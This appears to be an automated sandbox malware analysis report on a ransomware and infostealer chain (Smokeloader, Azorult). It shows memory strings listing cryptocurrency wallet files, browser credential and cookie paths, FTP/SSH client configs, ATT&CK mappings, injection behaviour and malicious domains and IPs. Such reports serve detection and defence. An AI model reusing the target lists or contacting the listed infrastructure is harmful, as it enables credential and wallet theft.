            Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: \\config\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: \\config\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
            Source: Yara matchFile source: 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: build2.exe PID: 5316, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.1982678563.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.2343916720.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.2344075429.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1710632872.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1982993082.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1710474391.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: 19.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.build2.exe.2d915a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.build2.exe.2d915a0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000012.00000002.2109889853.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: build2.exe PID: 7144, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: build2.exe PID: 5316, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting
            Valid Accounts1
            Windows Management Instrumentation
            1
            Scripting
            1
            Exploitation for Privilege Escalation
            1
            Deobfuscate/Decode Files or Information
            2
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services11
            Archive Collected Data
            14
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium2
            Data Encrypted for Impact
            CredentialsDomainsDefault Accounts2
            Native API
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            2
            Obfuscated Files or Information
            1
            Credentials in Registry
            1
            Account Discovery
            Remote Desktop Protocol4
            Data from Local System
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Shared Modules
            1
            Scheduled Task/Job
            612
            Process Injection
            2
            Software Packing
            Security Account Manager3
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Screen Capture
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            Exploitation for Client Execution
            1
            Registry Run Keys / Startup Folder
            1
            Scheduled Task/Job
            1
            DLL Side-Loading
            NTDS46
            System Information Discovery
            Distributed Component Object ModelInput Capture125
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud Accounts13
            Command and Scripting Interpreter
            1
            Services File Permissions Weakness
            1
            Registry Run Keys / Startup Folder
            1
            File Deletion
            LSA Secrets1
            Network Share Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable Media1
            Scheduled Task/Job
            RC Scripts1
            Services File Permissions Weakness
            11
            Masquerading
            Cached Domain Credentials591
            Security Software Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Modify Registry
            DCSync241
            Virtualization/Sandbox Evasion
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job241
            Virtualization/Sandbox Evasion
            Proc Filesystem3
            Process Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt612
            Process Injection
            /etc/passwd and /etc/shadow1
            Application Window Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            Hidden Files and Directories
            Network Sniffing1
            System Owner/User Discovery
            Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
            Services File Permissions Weakness
            Input Capture1
            System Network Configuration Discovery
            Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1447536 Sample: file.exe Startdate: 25/05/2024 Architecture: WINDOWS Score: 100 120 www.safeautomationbd.com 2->120 122 trad-einmyus.com 2->122 124 9 other IPs or domains 2->124 140 Snort IDS alert for network traffic 2->140 142 Multi AV Scanner detection for domain / URL 2->142 144 Found malware configuration 2->144 146 19 other signatures 2->146 15 file.exe 2->15         started        18 rujtcgu 2->18         started        20 rujtcgu 2->20         started        22 2 other processes 2->22 signatures3 process4 signatures5 174 Detected unpacking (changes PE section rights) 15->174 176 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 15->176 178 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 15->178 24 explorer.exe 31 10 15->24 injected 180 Multi AV Scanner detection for dropped file 18->180 182 Maps a DLL or memory area into another process 18->182 184 Checks if the current machine is a virtual machine (disk enumeration) 18->184 186 Creates a thread in another existing process (thread injection) 20->186 188 Detected unpacking (overwrites its own PE header) 22->188 190 Query firmware table information (likely to detect VMs) 22->190 192 Injects a PE file into a foreign processes 22->192 29 mstsca.exe 22->29         started        process6 dnsIp7 128 sdfjhuz.com 189.163.126.89, 49744, 49754, 80 UninetSAdeCVMX Mexico 24->128 130 nessotechbd.com 192.185.16.114, 443, 49773 UNIFIEDLAYER-AS-1US United States 24->130 132 7 other IPs or domains 24->132 98 C:\Users\user\AppData\Roaming\rujtcgu, PE32 24->98 dropped 100 C:\Users\user\AppData\Local\Temp609.exe, PE32 24->100 dropped 102 C:\Users\user\...\rujtcgu:Zone.Identifier, ASCII 24->102 dropped 164 System process connects to network (likely due to code injection or exploit) 24->164 166 Benign windows process drops PE files 24->166 168 Deletes itself after installation 24->168 170 Hides that the sample has been downloaded from the Internet (zone.identifier) 24->170 31 E609.exe 24->31         started        34 E609.exe 24->34         started        36 cmd.exe 1 24->36         started        40 4 other processes 24->40 38 schtasks.exe 29->38         started        file8 signatures9 process10 signatures11 194 Detected unpacking (changes PE section rights) 31->194 196 Detected unpacking (overwrites its own PE header) 31->196 198 Writes a notice file (html or txt) to demand a ransom 31->198 200 Contains functionality to inject code into remote processes 31->200 42 E609.exe 1 16 31->42         started        202 Antivirus detection for dropped file 34->202 204 Machine Learning detection for dropped file 34->204 206 Sample uses process hollowing technique 34->206 46 E609.exe 34->46         started        208 Uses cmd line tools excessively to alter registry or file data 36->208 48 conhost.exe 36->48         started        50 reg.exe 1 1 36->50         started        52 conhost.exe 38->52         started        210 Injects a PE file into a foreign processes 40->210 54 conhost.exe 40->54         started        56 reg.exe 40->56         started        58 E609.exe 40->58         started        60 E609.exe 40->60         started        process12 dnsIp13 134 api.2ip.ua 188.114.96.3, 443, 49746, 49751 CLOUDFLARENETUS European Union 42->134 104 C:\Users\user\AppData\Local\...609.exe, PE32 42->104 dropped 62 E609.exe 42->62         started        65 icacls.exe 42->65         started        106 C:\Users\user\_readme.txt, ASCII 46->106 dropped 108 C:\Users\user\AppData\Local\...\_readme.txt, ASCII 46->108 dropped file14 process15 signatures16 172 Injects a PE file into a foreign processes 62->172 67 E609.exe 1 26 62->67         started        process17 dnsIp18 126 cajgtus.com 213.172.74.157, 49757, 49758, 49760 AET-ASAZ Azerbaijan 67->126 90 C:\Users\user\AppData\Local\...\build3[1].exe, PE32 67->90 dropped 92 C:\Users\user\AppData\Local\...\build2[1].exe, PE32 67->92 dropped 94 C:\Users\user\AppData\Local\...\build3.exe, PE32 67->94 dropped 96 7 other malicious files 67->96 dropped 148 Modifies existing user documents (likely ransomware behavior) 67->148 72 build2.exe 67->72         started        75 build3.exe 67->75         started        file19 signatures20 process21 signatures22 150 Antivirus detection for dropped file 72->150 152 Multi AV Scanner detection for dropped file 72->152 154 Detected unpacking (changes PE section rights) 72->154 156 Injects a PE file into a foreign processes 72->156 77 build2.exe 72->77         started        158 Detected unpacking (overwrites its own PE header) 75->158 160 Machine Learning detection for dropped file 75->160 162 Uses schtasks.exe or at.exe to add and modify task schedules 75->162 82 build3.exe 75->82         started        process23 dnsIp24 136 steamcommunity.com 104.102.42.29, 443, 49762 AKAMAI-ASUS United States 77->136 138 65.109.242.59, 443, 49765, 49768 ALABANZA-BALTUS United States 77->138 110 C:\Users\user\AppData\...\softokn3[1].dll, PE32 77->110 dropped 112 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 77->112 dropped 114 C:\Users\user\AppData\...\mozglue[1].dll, PE32 77->114 dropped 118 10 other files (6 malicious) 77->118 dropped 212 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 77->212 214 Found many strings related to Crypto-Wallets (likely being stolen) 77->214 216 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 77->216 218 5 other signatures 77->218 84 cmd.exe 77->84         started        116 C:\Users\user\AppData\Roaming\...\mstsca.exe, PE32 82->116 dropped 86 schtasks.exe 82->86         started        file25 signatures26 process27 process28 88 conhost.exe 86->88         started       

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            file.exe32%ReversingLabs
            file.exe43%VirustotalBrowse
            file.exe100%AviraHEUR/AGEN.1311176
            file.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exe100%AviraTR/AD.MalwareCrypter.rddpg
            C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe100%AviraTR/AD.MalwareCrypter.llbpm
            C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe100%AviraTR/AD.MalwareCrypter.rddpg
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe100%AviraTR/AD.MalwareCrypter.llbpm
            C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe100%AviraHEUR/AGEN.1311176
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe100%Joe Sandbox ML
            C:\ProgramData\EGIJEBGDAFHI\freebl3.dll0%ReversingLabs
            C:\ProgramData\EGIJEBGDAFHI\mozglue.dll0%ReversingLabs
            C:\ProgramData\EGIJEBGDAFHI\msvcp140.dll0%ReversingLabs
            C:\ProgramData\EGIJEBGDAFHI\nss3.dll0%ReversingLabs
            C:\ProgramData\EGIJEBGDAFHI\softokn3.dll0%ReversingLabs
            C:\ProgramData\EGIJEBGDAFHI\vcruntime140.dll0%ReversingLabs
            C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe81%ReversingLabsWin32.Trojan.Smokeloader
            C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe87%ReversingLabsWin32.Trojan.Azorult
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exe81%ReversingLabsWin32.Trojan.Smokeloader
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe87%ReversingLabsWin32.Trojan.Azorult
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dll0%ReversingLabs
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll0%ReversingLabs
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll0%ReversingLabs
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll0%ReversingLabs
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll0%ReversingLabs
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll0%ReversingLabs
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll0%ReversingLabs
            C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe87%ReversingLabsWin32.Trojan.Azorult
            C:\Users\user\AppData\Roaming\rujtcgu32%ReversingLabs
            No Antivirus matches
            SourceDetectionScannerLabelLink
            safeautomationbd.com4%VirustotalBrowse
            sdfjhuz.com22%VirustotalBrowse
            cajgtus.com23%VirustotalBrowse
            steamcommunity.com0%VirustotalBrowse
            transfer.adttemp.com.br9%VirustotalBrowse
            nessotechbd.com18%VirustotalBrowse
            trad-einmyus.com17%VirustotalBrowse
            cdn.discordapp.com0%VirustotalBrowse
            api.2ip.ua6%VirustotalBrowse
            www.safeautomationbd.com2%VirustotalBrowse
            api.msn.com0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://trade-inmyus.com/index.php0%URL Reputationsafe
            https://aka.ms/odirmr0%URL Reputationsafe
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
            https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
            https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.0%URL Reputationsafe
            https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
            https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli0%URL Reputationsafe
            https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
            http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
            https://www.youtube.com0%URL Reputationsafe
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%URL Reputationsafe
            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc940%URL Reputationsafe
            https://wns.windows.com/L0%URL Reputationsafe
            https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;0%URL Reputationsafe
            https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%URL Reputationsafe
            https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win0%URL Reputationsafe
            https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-0%URL Reputationsafe
            https://lv.queniujq.cn0%URL Reputationsafe
            https://www.youtube.com/0%URL Reputationsafe
